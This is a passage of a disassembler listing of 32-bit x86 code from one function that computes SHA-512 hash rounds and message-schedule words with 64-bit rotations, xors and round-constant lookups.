mov edx, [eax+84h]
mov esi, [eax+0C4h]
mov [esp+170h+var_D8], ecx
mov ecx, [eax+88h]
mov [esp+170h+var_D4], edx
mov edx, [eax+8Ch]
mov [esp+170h+var_118], ecx
mov ecx, [eax+90h]
mov [esp+170h+var_114], edx
mov edx, [eax+94h]
mov [esp+170h+var_C8], ecx
mov ecx, [eax+98h]
mov [esp+170h+var_C4], edx
mov edx, [eax+9Ch]
mov [esp+170h+var_F0], ecx
mov ecx, [eax+0A0h]
mov [esp+170h+var_EC], edx
mov edx, [eax+0A4h]
mov [esp+170h+var_E8], ecx
mov ecx, [eax+0A8h]
mov [esp+170h+var_E4], edx
mov edx, [eax+0ACh]
mov [esp+170h+var_F8], ecx
mov ecx, [eax+0B0h]
mov [esp+170h+var_F4], edx
mov edx, [eax+0B4h]
mov [esp+170h+var_B0], ecx
mov ecx, [eax+0B8h]
mov [esp+170h+var_AC], edx
mov edx, [eax+0BCh]
mov [esp+170h+var_C0], ecx
mov ecx, [eax+0C0h]
mov [esp+170h+var_BC], edx
mov edx, [eax+0C8h]
mov eax, [eax+0CCh]
xor edi, edi
mov [esp+170h+var_15C], edi
mov [esp+170h+var_A0], ecx
mov [esp+170h+var_9C], esi
mov [esp+170h+var_E0], edx
mov [esp+170h+var_DC], eax
jmp short loc_41456E
; ---------------------------------------------------------------------------
align 10h
loc_414560: ; CODE XREF: sub_4143D0+2680�j
mov ecx, [esp+170h+var_A0]
mov esi, [esp+170h+var_9C]
loc_41456E: ; CODE XREF: sub_4143D0+18A�j
test edi, edi
mov eax, [esp+170h+var_138]
mov edx, [esp+170h+var_134]
jz loc_414658
mov edi, ecx
xor eax, eax
mov ebx, esi
shrd edi, ebx, 13h
or eax, edi
mov ebp, ecx
mov edx, ecx
mov edi, esi
shld esi, ebp, 3
shr ebx, 13h
shl edx, 0Dh
or edx, ebx
add ebp, ebp
xor ebx, ebx
or ebx, esi
mov esi, [esp+170h+var_9C]
shrd ecx, esi, 6
add ebp, ebp
add ebp, ebp
shr edi, 1Dh
or edi, ebp
xor eax, edi
xor eax, ecx
mov ecx, [esp+170h+var_10C]
xor edx, ebx
mov [esp+170h+var_160], eax
mov eax, [esp+170h+var_110]
mov ebp, ecx
mov ebx, eax
shrd ebx, ebp, 8
shr esi, 6
xor edx, esi
xor edi, edi
or edi, ebx
mov esi, eax
mov ebx, eax
shrd eax, ecx, 1
shl esi, 18h
shr ebp, 8
or esi, ebp
shr ecx, 1
xor ebp, ebp
or ebp, eax
mov eax, [esp+170h+var_10C]
shl ebx, 1Fh
or ebx, ecx
mov ecx, [esp+170h+var_110]
shrd ecx, eax, 7
shr eax, 7
xor edi, ebp
xor esi, ebx
xor esi, eax
mov eax, [esp+170h+arg_0]
xor edi, ecx
mov ecx, [esp+170h+var_160]
add ecx, edi
adc edx, esi
add ecx, [esp+170h+var_100]
adc edx, [esp+170h+var_FC]
add ecx, [esp+170h+var_F0]
adc edx, [esp+170h+var_EC]
mov [eax+50h], ecx
mov [eax+54h], edx
mov eax, edx
mov edx, [esp+170h+var_134]
mov [esp+170h+var_FC], eax
mov [esp+170h+var_54], eax
mov eax, [esp+170h+var_138]
mov [esp+170h+var_100], ecx
mov [esp+170h+var_58], ecx
jmp short loc_41466E
; ---------------------------------------------------------------------------
loc_414658: ; CODE XREF: sub_4143D0+1A8�j
mov ecx, [esp+170h+var_100]
mov [esp+170h+var_58], ecx
mov ecx, [esp+170h+var_FC]
mov [esp+170h+var_54], ecx
loc_41466E: ; CODE XREF: sub_4143D0+286�j
mov ebx, edx
mov esi, edx
xor edi, edi
mov ecx, eax
shld ebx, ecx, 17h
or edi, ebx
shl ecx, 17h
xor ebx, ebx
shr esi, 9
or esi, ecx
mov ebp, eax
shrd ebp, edx, 12h
or ebx, ebp
mov ebp, [esp+170h+var_134]
xor esi, ebx
shr edx, 12h
mov ecx, eax
shl ecx, 0Eh
or ecx, edx
xor edi, ecx
xor ecx, ecx
mov ebx, eax
shrd ebx, ebp, 0Eh
or ecx, ebx
xor esi, ecx
mov ecx, [esp+170h+var_134]
shr ebp, 0Eh
mov edx, eax
shl edx, 12h
or edx, ebp
mov ebp, [esp+170h+var_130]
xor edi, edx
and ebp, eax
mov edx, eax
mov eax, [esp+170h+var_12C]
and eax, ecx
mov ebx, ecx
mov ecx, [esp+170h+var_11C]
not edx
and edx, [esp+170h+var_128]
not ebx
and ebx, [esp+170h+var_124]
xor edx, ebp
xor ebx, eax
mov eax, [esp+170h+var_15C]
add esi, edx
adc edi, ebx
add esi, ds:dword_41F950[eax*8]
adc edi, ds:dword_41F954[eax*8]
add esi, [esp+170h+var_58]
mov eax, [esp+170h+var_120]
adc edi, [esp+170h+var_54]
add eax, esi
adc ecx, edi
add [esp+170h+var_140], eax
mov [esp+170h+var_11C], ecx
mov [esp+170h+var_120], eax
adc [esp+170h+var_13C], ecx
mov eax, [esp+170h+var_154]
mov ecx, [esp+170h+var_158]
mov edx, ecx
mov esi, ecx
mov ebx, eax
shrd edx, ebx, 1Ch
xor edi, edi
or edi, edx
mov ebp, eax
shld ebp, ecx, 1Eh
shr ebx, 1Ch
shl esi, 4
or esi, ebx
mov edx, eax
shl ecx, 1Eh
shr edx, 2
xor ebx, ebx
or edx, ecx
or ebx, ebp
mov ecx, eax
xor edi, edx
xor esi, ebx
shr ecx, 7
mov ebx, [esp+170h+var_158]
mov ebp, eax
shld ebp, ebx, 19h
shl ebx, 19h
or ecx, ebx
xor edx, edx
or edx, ebp
mov ebp, [esp+170h+var_14C]
xor edi, ecx
mov ecx, [esp+170h+var_150]
xor esi, edx
mov edx, [esp+170h+var_158]
mov ebx, ecx
xor ebx, edx
and ebx, [esp+170h+var_148]
and ecx, edx
mov edx, [esp+170h+var_14C]
xor ebp, eax
and ebp, [esp+170h+var_144]
and edx, eax
xor ebx, ecx
xor ebp, edx
add edi, ebx
adc esi, ebp
add [esp+170h+var_120], edi
adc [esp+170h+var_11C], esi
cmp [esp+170h+var_15C], 0
jz loc_414884
mov eax, [esp+170h+var_E0]
mov ecx, [esp+170h+var_DC]
mov ebx, ecx
mov edi, eax
shrd edi, ebx, 13h
xor esi, esi
or esi, edi
mov edi, ecx
shr ebx, 13h
mov edx, eax
mov ebp, eax
shld ecx, ebp, 3
shl edx, 0Dh
or edx, ebx
xor ebx, ebx
or ebx, ecx
mov ecx, [esp+170h+var_DC]
shrd eax, ecx, 6
add ebp, ebp
add ebp, ebp
add ebp, ebp
shr edi, 1Dh
or edi, ebp
xor esi, edi
xor esi, eax
mov eax, [esp+170h+var_108]
xor edx, ebx
shr ecx, 6
xor edx, ecx
mov ecx, [esp+170h+var_104]
mov ebp, ecx
mov ebx, eax
shrd ebx, ebp, 8
xor edi, edi
or edi, ebx
mov [esp+170h+var_160], esi
mov esi, eax
mov ebx, eax
shrd eax, ecx, 1
shl esi, 18h
shr ebp, 8
or esi, ebp
shr ecx, 1
xor ebp, ebp
or ebp, eax
mov eax, [esp+170h+var_108]
shl ebx, 1Fh
or ebx, ecx
mov ecx, [esp+170h+var_104]
shrd eax, ecx, 7
shr ecx, 7
xor esi, ebx
xor edi, ebp
xor esi, ecx
mov ecx, [esp+170h+var_160]
xor edi, eax
mov eax, [esp+170h+arg_0]
add ecx, edi
adc edx, esi
add ecx, [esp+170h+var_E8]
adc edx, [esp+170h+var_E4]
add ecx, [esp+170h+var_110]
adc edx, [esp+170h+var_10C]
mov [eax+58h], ecx
mov [eax+5Ch], edx
mov eax, edx
mov [esp+170h+var_110], ecx
mov [esp+170h+var_10C], eax
mov [esp+170h+var_28], ecx
jmp short loc_414893
; ---------------------------------------------------------------------------
loc_414884: ; CODE XREF: sub_4143D0+3D5�j
mov edx, [esp+170h+var_110]
mov eax, [esp+170h+var_10C]
mov [esp+170h+var_28], edx
loc_414893: ; CODE XREF: sub_4143D0+4B2�j
mov ecx, [esp+170h+var_13C]
mov ebx, ecx
mov [esp+170h+var_24], eax
mov eax, [esp+170h+var_140]
mov edx, ecx
xor esi, esi
shr edx, 9
mov edi, eax
shld ebx, edi, 17h
or esi, ebx
shl edi, 17h
or edx, edi
xor ebx, ebx
mov ebp, eax
shrd ebp, ecx, 12h
or ebx, ebp
mov ebp, [esp+170h+var_13C]
xor edx, ebx
shr ecx, 12h
mov edi, eax
shl edi, 0Eh
or edi, ecx
xor esi, edi
xor edi, edi
mov ebx, eax
shrd ebx, ebp, 0Eh
or edi, ebx
xor edx, edi
shr ebp, 0Eh
mov ecx, eax
shl ecx, 12h
or ecx, ebp
xor esi, ecx
mov ecx, [esp+170h+var_13C]
mov ebx, ecx
and ecx, [esp+170h+var_134]
mov edi, eax
and eax, [esp+170h+var_138]
not ebx
and ebx, [esp+170h+var_12C]
not edi
and edi, [esp+170h+var_130]
xor ebx, ecx
mov ecx, [esp+170h+var_124]
xor edi, eax
mov eax, [esp+170h+var_15C]
add edx, edi
adc esi, ebx
add edx, ds:dword_41F958[eax*8]
adc esi, ds:dword_41F95C[eax*8]
add edx, [esp+170h+var_28]
mov eax, [esp+170h+var_128]
adc esi, [esp+170h+var_24]
add eax, edx
adc ecx, esi
add [esp+170h+var_148], eax
mov [esp+170h+var_124], ecx
mov [esp+170h+var_128], eax
adc [esp+170h+var_144], ecx
mov eax, [esp+170h+var_11C]
mov ecx, [esp+170h+var_120]
mov edx, ecx
mov ebx, eax
shrd edx, ebx, 1Ch
mov esi, ecx
xor edi, edi
or edi, edx
mov ebp, eax
shld ebp, ecx, 1Eh
shr ebx, 1Ch
shl esi, 4
or esi, ebx
mov edx, eax
shl ecx, 1Eh
shr edx, 2
xor ebx, ebx
or edx, ecx
or ebx, ebp
xor edi, edx
xor esi, ebx
mov ecx, eax
mov ebx, [esp+170h+var_120]
xor edx, edx
mov ebp, eax
shld ebp, ebx, 19h
or edx, ebp
mov ebp, [esp+170h+var_154]
shl ebx, 19h
shr ecx, 7
or ecx, ebx
xor esi, edx
mov edx, [esp+170h+var_158]
xor edi, ecx
mov ecx, [esp+170h+var_120]
mov ebx, edx
xor ebx, ecx
and ebx, [esp+170h+var_150]
and edx, ecx
mov ecx, [esp+170h+var_154]
xor ebp, eax
and ebp, [esp+170h+var_14C]
and ecx, eax
xor ebx, edx
xor ebp, ecx
add edi, ebx
adc esi, ebp
add [esp+170h+var_128], edi
adc [esp+170h+var_124], esi
cmp [esp+170h+var_15C], 0
jz loc_414AAE
mov eax, [esp+170h+var_B8]
mov ecx, [esp+170h+var_B4]
mov ebx, ecx
mov edi, eax
shrd edi, ebx, 8
mov ebp, eax
shrd ebp, ecx, 1
xor esi, esi
or esi, edi
shr ecx, 1
mov edi, eax
mov edx, eax
shr ebx, 8
shl edi, 1Fh
or edi, ecx
mov ecx, [esp+170h+var_B4]
shrd eax, ecx, 7
shl edx, 18h
or edx, ebx
xor ebx, ebx
or ebx, ebp
xor esi, ebx
xor esi, eax
mov eax, [esp+170h+var_100]
xor edx, edi
shr ecx, 7
xor edx, ecx
mov ecx, [esp+170h+var_FC]
mov ebx, eax
mov ebp, ecx
shrd ebx, ebp, 13h
xor edi, edi
or edi, ebx
mov ebx, ecx
mov [esp+170h+var_160], esi
mov esi, eax
shld ecx, eax, 3
add eax, eax
add eax, eax
shl esi, 0Dh
shr ebp, 13h
or esi, ebp
add eax, eax
shr ebx, 1Dh
or ebx, eax
mov eax, [esp+170h+var_100]
xor ebp, ebp
or ebp, ecx
mov ecx, [esp+170h+var_FC]
shrd eax, ecx, 6
shr ecx, 6
xor esi, ebp
xor edi, ebx
xor esi, ecx
mov ecx, [esp+170h+var_160]
xor edi, eax
mov eax, [esp+170h+arg_0]
add ecx, edi
adc edx, esi
add ecx, [esp+170h+var_F8]
adc edx, [esp+170h+var_F4]
add ecx, [esp+170h+var_108]
adc edx, [esp+170h+var_104]
mov [eax+60h], ecx
mov [eax+64h], edx
mov eax, edx
mov [esp+170h+var_108], ecx
mov [esp+170h+var_104], eax
mov [esp+170h+var_70], ecx
jmp short loc_414ABD
; ---------------------------------------------------------------------------
loc_414AAE: ; CODE XREF: sub_4143D0+605�j
mov edx, [esp+170h+var_108]
mov eax, [esp+170h+var_104]
mov [esp+170h+var_70], edx
loc_414ABD: ; CODE XREF: sub_4143D0+6DC�j
mov ecx, [esp+170h+var_144]
mov ebx, ecx
mov [esp+170h+var_6C], eax
mov eax, [esp+170h+var_148]
mov edx, ecx
xor esi, esi
shr edx, 9
mov edi, eax
shld ebx, edi, 17h
or esi, ebx
shl edi, 17h
or edx, edi
xor ebx, ebx
mov ebp, eax
shrd ebp, ecx, 12h
or ebx, ebp
mov ebp, [esp+170h+var_144]
xor edx, ebx
shr ecx, 12h
mov edi, eax
shl edi, 0Eh
or edi, ecx
xor esi, edi
xor edi, edi
mov ebx, eax
shrd ebx, ebp, 0Eh
or edi, ebx
xor edx, edi
shr ebp, 0Eh
mov ecx, eax
shl ecx, 12h
or ecx, ebp
xor esi, ecx
mov ecx, [esp+170h+var_144]
mov ebx, ecx
and ecx, [esp+170h+var_13C]
mov edi, eax
and eax, [esp+170h+var_140]
not ebx
and ebx, [esp+170h+var_134]
not edi
and edi, [esp+170h+var_138]
xor ebx, ecx
mov ecx, [esp+170h+var_12C]
xor edi, eax
mov eax, [esp+170h+var_15C]
add edx, edi
adc esi, ebx
add edx, ds:dword_41F960[eax*8]
adc esi, ds:dword_41F964[eax*8]
add edx, [esp+170h+var_70]
mov eax, [esp+170h+var_130]
adc esi, [esp+170h+var_6C]
add eax, edx
adc ecx, esi
add [esp+170h+var_150], eax
mov [esp+170h+var_12C], ecx
mov [esp+170h+var_130], eax
adc [esp+170h+var_14C], ecx
mov eax, [esp+170h+var_124]
mov ecx, [esp+170h+var_128]
mov edx, ecx
mov ebx, eax
shrd edx, ebx, 1Ch
mov esi, ecx
xor edi, edi
or edi, edx
mov ebp, eax
shld ebp, ecx, 1Eh
shr ebx, 1Ch
shl esi, 4
or esi, ebx
mov edx, eax
shl ecx, 1Eh
shr edx, 2
xor ebx, ebx
or edx, ecx
or ebx, ebp
xor edi, edx
xor esi, ebx
mov ecx, eax
mov ebx, [esp+170h+var_128]
xor edx, edx
mov ebp, eax
shld ebp, ebx, 19h
or edx, ebp
mov ebp, [esp+170h+var_11C]
shl ebx, 19h
shr ecx, 7
or ecx, ebx
xor esi, edx
mov edx, [esp+170h+var_120]
xor edi, ecx
mov ecx, [esp+170h+var_128]
mov ebx, edx
xor ebx, ecx
and ebx, [esp+170h+var_158]
and edx, ecx
mov ecx, [esp+170h+var_11C]
xor ebp, eax
and ebp, [esp+170h+var_154]
and ecx, eax
xor ebx, edx
xor ebp, ecx
add edi, ebx
adc esi, ebp
add [esp+170h+var_130], edi
adc [esp+170h+var_12C], esi
cmp [esp+170h+var_15C], 0
jz loc_414CEA
mov eax, [esp+170h+var_A8]
mov ecx, [esp+170h+var_A4]
mov ebx, ecx
mov edi, eax
shrd edi, ebx, 8
mov ebp, eax
shrd ebp, ecx, 1
xor esi, esi
or esi, edi
shr ecx, 1
mov edi, eax
mov edx, eax
shr ebx, 8
shl edi, 1Fh
or edi, ecx
mov ecx, [esp+170h+var_A4]
shrd eax, ecx, 7
shl edx, 18h
or edx, ebx
xor ebx, ebx
or ebx, ebp
xor esi, ebx
xor esi, eax
mov eax, [esp+170h+var_110]
xor edx, edi
shr ecx, 7
xor edx, ecx
mov ecx, [esp+170h+var_10C]
mov ebx, eax
mov ebp, ecx
shrd ebx, ebp, 13h
xor edi, edi
or edi, ebx
mov ebx, ecx
mov [esp+170h+var_160], esi
mov esi, eax
shld ecx, eax, 3
add eax, eax
add eax, eax
shl esi, 0Dh
shr ebp, 13h
or esi, ebp
add eax, eax
shr ebx, 1Dh
or ebx, eax
mov eax, [esp+170h+var_110]
xor ebp, ebp
or ebp, ecx
mov ecx, [esp+170h+var_10C]
shrd eax, ecx, 6
shr ecx, 6
xor esi, ebp
xor edi, ebx
xor esi, ecx
mov ecx, [esp+170h+var_160]
xor edi, eax
mov eax, [esp+170h+arg_0]
add ecx, edi
adc edx, esi
add ecx, [esp+170h+var_B0]
adc edx, [esp+170h+var_AC]
add ecx, [esp+170h+var_B8]
adc edx, [esp+170h+var_B4]
mov [eax+68h], ecx
mov [eax+6Ch], edx
mov eax, edx
mov [esp+170h+var_B8], ecx
mov [esp+170h+var_B4], eax
mov [esp+170h+var_38], ecx
jmp short loc_414CFF
; ---------------------------------------------------------------------------
loc_414CEA: ; CODE XREF: sub_4143D0+82F�j
mov edx, [esp+170h+var_B8]
mov eax, [esp+170h+var_B4]
mov [esp+170h+var_38], edx
loc_414CFF: ; CODE XREF: sub_4143D0+918�j
mov ecx, [esp+170h+var_14C]
mov ebx, ecx
mov [esp+170h+var_34], eax
mov eax, [esp+170h+var_150]
xor esi, esi
mov edx, ecx
mov edi, eax
shld ebx, edi, 17h
or esi, ebx
shl edi, 17h
xor ebx, ebx
shr edx, 9
or edx, edi
mov ebp, eax
shrd ebp, ecx, 12h
or ebx, ebp
mov ebp, [esp+170h+var_14C]
xor edx, ebx
shr ecx, 12h
mov edi, eax
shl edi, 0Eh
or edi, ecx
xor esi, edi
mov ebx, eax
shrd ebx, ebp, 0Eh
xor edi, edi
or edi, ebx
xor edx, edi
shr ebp, 0Eh
mov ecx, eax
shl ecx, 12h
or ecx, ebp
mov ebp, [esp+170h+var_148]
xor esi, ecx
mov ecx, [esp+170h+var_14C]
and ebp, eax
mov edi, eax
mov eax, [esp+170h+var_144]
and eax, ecx
mov ebx, ecx
mov ecx, [esp+170h+var_134]
not ebx
and ebx, [esp+170h+var_13C]
not edi
and edi, [esp+170h+var_140]
xor ebx, eax
mov eax, [esp+170h+var_15C]
xor edi, ebp
add edx, edi
adc esi, ebx
add edx, ds:dword_41F968[eax*8]
adc esi, ds:dword_41F96C[eax*8]
add edx, [esp+170h+var_38]
mov eax, [esp+170h+var_138]
adc esi, [esp+170h+var_34]
add eax, edx
adc ecx, esi
add [esp+170h+var_158], eax
mov [esp+170h+var_134], ecx
mov [esp+170h+var_138], eax
adc [esp+170h+var_154], ecx
mov ecx, [esp+170h+var_130]
mov eax, [esp+170h+var_12C]
mov edx, ecx
mov ebx, eax
shrd edx, ebx, 1Ch
mov esi, ecx
mov ebp, eax
shld ebp, ecx, 1Eh
xor edi, edi
or edi, edx
shr ebx, 1Ch
shl esi, 4
or esi, ebx
mov edx, eax
shr edx, 2
shl ecx, 1Eh
xor ebx, ebx
or edx, ecx
or ebx, ebp
xor edi, edx
xor esi, ebx
mov ebx, [esp+170h+var_130]
xor edx, edx
mov ebp, eax
shld ebp, ebx, 19h
or edx, ebp
mov ebp, [esp+170h+var_124]
shl ebx, 19h
xor esi, edx
mov edx, [esp+170h+var_128]
mov ecx, eax
shr ecx, 7
or ecx, ebx
xor edi, ecx
mov ecx, [esp+170h+var_130]
mov ebx, edx
xor ebx, ecx
and ebx, [esp+170h+var_120]
and edx, ecx
mov ecx, [esp+170h+var_124]
xor ebp, eax
and ebp, [esp+170h+var_11C]
and ecx, eax
xor ebx, edx
xor ebp, ecx
add edi, ebx
adc esi, ebp
add [esp+170h+var_138], edi
adc [esp+170h+var_134], esi
cmp [esp+170h+var_15C], 0
jz loc_414F30
mov eax, [esp+170h+var_D0]
mov ecx, [esp+170h+var_CC]
mov ebx, ecx
mov edi, eax
shrd edi, ebx, 8
mov ebp, eax
shrd ebp, ecx, 1
xor esi, esi
or esi, edi
shr ecx, 1
mov edi, eax
mov edx, eax
shr ebx, 8
shl edi, 1Fh
or edi, ecx
mov ecx, [esp+170h+var_CC]
shrd eax, ecx, 7
shl edx, 18h
or edx, ebx
xor ebx, ebx
or ebx, ebp
xor esi, ebx
xor esi, eax
mov eax, [esp+170h+var_108]
xor edx, edi
shr ecx, 7
xor edx, ecx
mov ecx, [esp+170h+var_104]
mov ebx, eax
mov ebp, ecx
shrd ebx, ebp, 13h
xor edi, edi
or edi, ebx
mov ebx, ecx
mov [esp+170h+var_160], esi
mov esi, eax
shld ecx, eax, 3
add eax, eax
add eax, eax
shl esi, 0Dh
shr ebp, 13h
or esi, ebp
add eax, eax
shr ebx, 1Dh
or ebx, eax
mov eax, [esp+170h+var_108]
xor ebp, ebp
or ebp, ecx
mov ecx, [esp+170h+var_104]
shrd eax, ecx, 6
shr ecx, 6
xor esi, ebp
xor edi, ebx
xor esi, ecx
mov ecx, [esp+170h+var_160]
xor edi, eax
mov eax, [esp+170h+arg_0]
add ecx, edi
adc edx, esi
add ecx, [esp+170h+var_C0]
adc edx, [esp+170h+var_BC]
add ecx, [esp+170h+var_A8]
adc edx, [esp+170h+var_A4]
mov [eax+70h], ecx
mov [eax+74h], edx
mov eax, edx
mov [esp+170h+var_A8], ecx
mov [esp+170h+var_A4], eax
mov [esp+170h+var_88], ecx
jmp short loc_414F45
; ---------------------------------------------------------------------------
loc_414F30: ; CODE XREF: sub_4143D0+A75�j
mov edx, [esp+170h+var_A8]
mov eax, [esp+170h+var_A4]
mov [esp+170h+var_88], edx
loc_414F45: ; CODE XREF: sub_4143D0+B5E�j
mov ecx, [esp+170h+var_154]
mov [esp+170h+var_84], eax
mov eax, [esp+170h+var_158]
mov ebx, ecx
xor esi, esi
mov edi, eax
shld ebx, edi, 17h
or esi, ebx
shl edi, 17h
mov edx, ecx
shr edx, 9
or edx, edi
mov ebp, eax
shrd ebp, ecx, 12h
xor ebx, ebx
or ebx, ebp
mov ebp, [esp+170h+var_154]
xor edx, ebx
shr ecx, 12h
mov edi, eax
shl edi, 0Eh
or edi, ecx
xor esi, edi
mov ebx, eax
shrd ebx, ebp, 0Eh
xor edi, edi
or edi, ebx
xor edx, edi
mov ecx, eax
shl ecx, 12h
shr ebp, 0Eh
or ecx, ebp
mov ebp, [esp+170h+var_150]
xor esi, ecx
mov ecx, [esp+170h+var_154]
and ebp, eax
mov edi, eax
mov eax, [esp+170h+var_14C]
and eax, ecx
mov ebx, ecx
mov ecx, [esp+170h+var_13C]
not edi
and edi, [esp+170h+var_148]
not ebx
and ebx, [esp+170h+var_144]
xor edi, ebp
xor ebx, eax
mov eax, [esp+170h+var_15C]
add edx, edi
adc esi, ebx
add edx, ds:dword_41F970[eax*8]
mov edi, [esp+170h+var_12C]
adc esi, ds:dword_41F974[eax*8]
add edx, [esp+170h+var_88]
mov eax, [esp+170h+var_140]
adc esi, [esp+170h+var_84]
add eax, edx
adc ecx, esi
add [esp+170h+var_120], eax
mov esi, [esp+170h+var_130]
mov [esp+170h+var_140], eax
adc [esp+170h+var_11C], ecx
mov [esp+170h+var_13C], ecx
mov ecx, [esp+170h+var_138]
mov eax, esi
xor eax, ecx
mov [esp+170h+var_98], eax
mov eax, [esp+170h+var_134]
mov edx, edi
xor edx, eax
mov [esp+170h+var_94], edx
mov edx, esi
and edx, ecx
mov [esp+170h+var_90], edx
mov edx, edi
and edx, eax
mov [esp+170h+var_8C], edx
mov edx, ecx
xor esi, esi
shl edx, 4
mov edi, ecx
mov ebx, eax
shrd edi, ebx, 1Ch
shr ebx, 1Ch
or edx, ebx
or esi, edi
mov ebp, eax
shld ebp, ecx, 1Eh
xor ebx, ebx
shl ecx, 1Eh
or ebx, ebp
mov edi, eax
xor edx, ebx
mov ebx, [esp+170h+var_138]
shr edi, 2
or edi, ecx
mov ecx, eax
shld eax, ebx, 19h
xor esi, edi
shr ecx, 7
xor edi, edi
or edi, eax
mov eax, [esp+170h+var_98]
and eax, [esp+170h+var_128]
shl ebx, 19h
xor eax, [esp+170h+var_90]
or ecx, ebx
xor esi, ecx
mov ecx, [esp+170h+var_94]
and ecx, [esp+170h+var_124]
xor edx, edi
xor ecx, [esp+170h+var_8C]
add esi, eax
adc edx, ecx
add [esp+170h+var_140], esi
adc [esp+170h+var_13C], edx
cmp [esp+170h+var_15C], 0
jz loc_4151B2
mov eax, [esp+170h+var_B8]
mov ecx, [esp+170h+var_B4]
mov ebx, ecx
mov edi, eax
shrd edi, ebx, 13h
xor esi, esi
or esi, edi
mov edi, ecx
shr ebx, 13h
mov edx, eax
mov ebp, eax
shld ecx, ebp, 3
shl edx, 0Dh
or edx, ebx
xor ebx, ebx
or ebx, ecx
mov ecx, [esp+170h+var_B4]
shrd eax, ecx, 6
add ebp, ebp
add ebp, ebp
add ebp, ebp
shr edi, 1Dh
or edi, ebp
xor esi, edi
xor esi, eax
mov eax, [esp+170h+var_D8]
xor edx, ebx
shr ecx, 6
xor edx, ecx
mov ecx, [esp+170h+var_D4]
mov ebp, ecx
mov ebx, eax
shrd ebx, ebp, 8
xor edi, edi
or edi, ebx
mov [esp+170h+var_160], esi
mov esi, eax
mov ebx, eax
shrd eax, ecx, 1
shl esi, 18h
shr ebp, 8
or esi, ebp
shr ecx, 1
xor ebp, ebp
or ebp, eax
mov eax, [esp+170h+var_D8]
shl ebx, 1Fh
or ebx, ecx
mov ecx, [esp+170h+var_D4]
shrd eax, ecx, 7
shr ecx, 7
xor esi, ebx
xor edi, ebp
xor esi, ecx
mov ecx, [esp+170h+var_160]
xor edi, eax
mov eax, [esp+170h+arg_0]
add ecx, edi
adc edx, esi
add ecx, [esp+170h+var_D0]
adc edx, [esp+170h+var_CC]
add ecx, [esp+170h+var_A0]
adc edx, [esp+170h+var_9C]
mov [eax+78h], ecx
mov [eax+7Ch], edx
mov eax, edx
mov [esp+170h+var_D0], ecx
mov [esp+170h+var_CC], eax
mov [esp+170h+var_60], ecx
jmp short loc_4151C7
; ---------------------------------------------------------------------------
loc_4151B2: ; CODE XREF: sub_4143D0+CEB�j
mov edx, [esp+170h+var_D0]
mov eax, [esp+170h+var_CC]
mov [esp+170h+var_60], edx
loc_4151C7: ; CODE XREF: sub_4143D0+DE0�j
mov ecx, [esp+170h+var_11C]
mov ebx, ecx
mov [esp+170h+var_5C], eax
mov eax, [esp+170h+var_120]
xor esi, esi
mov edx, ecx
mov edi, eax
shld ebx, edi, 17h
or esi, ebx
shl edi, 17h
xor ebx, ebx
shr edx, 9
or edx, edi
mov ebp, eax
shrd ebp, ecx, 12h
or ebx, ebp
mov ebp, [esp+170h+var_11C]
xor edx, ebx
shr ecx, 12h
mov edi, eax
shl edi, 0Eh
or edi, ecx
xor esi, edi
mov ebx, eax
shrd ebx, ebp, 0Eh
shr ebp, 0Eh
xor edi, edi
or edi, ebx
xor edx, edi
mov ecx, eax
shl ecx, 12h
or ecx, ebp
mov ebp, [esp+170h+var_158]
xor esi, ecx
mov ecx, [esp+170h+var_11C]
and ebp, eax
mov edi, eax
mov eax, [esp+170h+var_154]
and eax, ecx
mov ebx, ecx
mov ecx, [esp+170h+var_148]
not ebx
and ebx, [esp+170h+var_14C]
not edi
and edi, [esp+170h+var_150]
xor ebx, eax
mov eax, [esp+170h+var_15C]
xor edi, ebp
add edx, edi
adc esi, ebx
add edx, ds:dword_41F978[eax*8]
adc esi, ds:dword_41F97C[eax*8]
add edx, [esp+170h+var_60]
mov eax, [esp+170h+var_128]
adc esi, [esp+170h+var_5C]
add ecx, edx
mov edx, [esp+170h+var_144]
adc edx, esi
add eax, ecx
adc [esp+170h+var_124], edx
mov [esp+170h+var_148], ecx
mov ecx, [esp+170h+var_140]
mov [esp+170h+var_144], edx
mov edx, [esp+170h+var_13C]
mov ebx, ecx
mov ebp, edx
shrd ebx, ebp, 1Ch
xor edi, edi
or edi, ebx
mov esi, ecx
mov ebx, edx
shld edx, ecx, 1Eh
shr ebp, 1Ch
shl esi, 4
or esi, ebp
shr ebx, 2
shl ecx, 1Eh
xor ebp, ebp
or ebx, ecx
mov [esp+170h+var_128], eax
or ebp, edx
mov ecx, [esp+170h+var_13C]
xor esi, ebp
mov ebp, [esp+170h+var_140]
mov edx, ecx
shld ecx, ebp, 19h
xor edi, ebx
shr edx, 7
xor ebx, ebx
or ebx, ecx
mov ecx, [esp+170h+var_98]
and ecx, [esp+170h+var_140]
shl ebp, 19h
xor ecx, [esp+170h+var_90]
or edx, ebp
xor edi, edx
mov edx, [esp+170h+var_94]
and edx, [esp+170h+var_13C]
xor esi, ebx
xor edx, [esp+170h+var_8C]
add edi, ecx
adc esi, edx
add [esp+170h+var_148], edi
adc [esp+170h+var_144], esi
cmp [esp+170h+var_15C], 0
jz loc_41540D
mov eax, [esp+170h+var_A8]
mov ecx, [esp+170h+var_A4]
mov ebx, ecx
mov edi, eax
shrd edi, ebx, 13h
xor esi, esi
or esi, edi
mov edi, ecx
shr ebx, 13h
mov edx, eax
mov ebp, eax
shld ecx, ebp, 3
shl edx, 0Dh
or edx, ebx
xor ebx, ebx
or ebx, ecx
mov ecx, [esp+170h+var_A4]
shrd eax, ecx, 6
add ebp, ebp
add ebp, ebp
add ebp, ebp
shr edi, 1Dh
or edi, ebp
xor esi, edi
xor esi, eax
mov eax, [esp+170h+var_118]
xor edx, ebx
shr ecx, 6
xor edx, ecx
mov ecx, [esp+170h+var_114]
mov ebp, ecx
mov ebx, eax
shrd ebx, ebp, 8
xor edi, edi
or edi, ebx
mov [esp+170h+var_160], esi
mov esi, eax
mov ebx, eax
shrd eax, ecx, 1
shl esi, 18h
shr ebp, 8
or esi, ebp
shr ecx, 1
xor ebp, ebp
or ebp, eax
mov eax, [esp+170h+var_118]
shl ebx, 1Fh
or ebx, ecx
mov ecx, [esp+170h+var_114]
shrd eax, ecx, 7
shr ecx, 7
xor esi, ebx
xor edi, ebp
xor edi, eax
mov eax, [esp+170h+arg_0]
xor esi, ecx
mov ecx, [esp+170h+var_160]
add ecx, edi
adc edx, esi
add ecx, [esp+170h+var_D8]
adc edx, [esp+170h+var_D4]
add ecx, [esp+170h+var_E0]
adc edx, [esp+170h+var_DC]
mov [eax+80h], ecx
mov [eax+84h], edx
mov eax, edx
mov [esp+170h+var_D4], eax
mov [esp+170h+var_14], eax
mov eax, [esp+170h+var_128]
